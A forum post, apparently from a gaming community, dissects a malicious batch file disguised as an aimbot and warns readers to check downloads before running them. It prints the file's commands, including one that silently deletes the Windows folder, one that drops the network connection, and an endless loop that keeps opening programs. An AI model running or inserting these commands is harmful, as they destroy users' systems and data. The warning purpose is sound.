That's what was inside the batch file -God- had posted.

What -God- posted was a .Bat file that had several different commands.

:Start - Causes the commands that follow to activate without any user interaction.

start iexplore.exe - The next few commands that he included all had the prefix "Start" in front of them. Basically anything that has prefix "start" in front of if causes the following .exe or directory to open automatically.

ipconfig/release - This would dick noobs. This command disconnects (Releases) your current IP address that your ISP has configured for you. Basically you just can't connect to the internet until you either reset your modem, or use the ipconfig/renew command.

rd /s /q C:WINDOWS - But out of all the commands installed in this .Bat this one is by far the worst. This command permanently deletes your WINDOWS folder without first prompting you. Theres no way to stop this command once it's initiated so basically if you ran this .Bat your not even going to know what happened.


goto Start - This funny little command makes this .Bat loop endlessly, maxing out your CPU usage with all the programs opening, and anally pounding your computer with remove directory commands.


A simple yet effective way to crash a computer.

So you know what this teaches us?
ALWAYS CHECK THROUGH FILES YOU'VE DOWNLOADED BEFORE RUNNING THEM!

Well the scanning part wouldn't do it for this one, as it was just a AimBot.Bat batch file.
The scanners wouldn't have found anything wrong with the AimBot.rar file he posted.

But looking over what you download and knowing what a .bat file can do would have helped on this one.

There was a total of 10 downloads from all the threads that he posted it into.
I hope those ten looked before trying it. :rolleyes:

Just leave him alone, he probably ment posts... jeez and this is a quote from the "Forum Etiquette" "Contributors are asked to stay on-topic of thread." Please do this and post somthing helpful, I know Hok, and I know he won't flame back so a1, please do what needs to be done about this. Thanks.
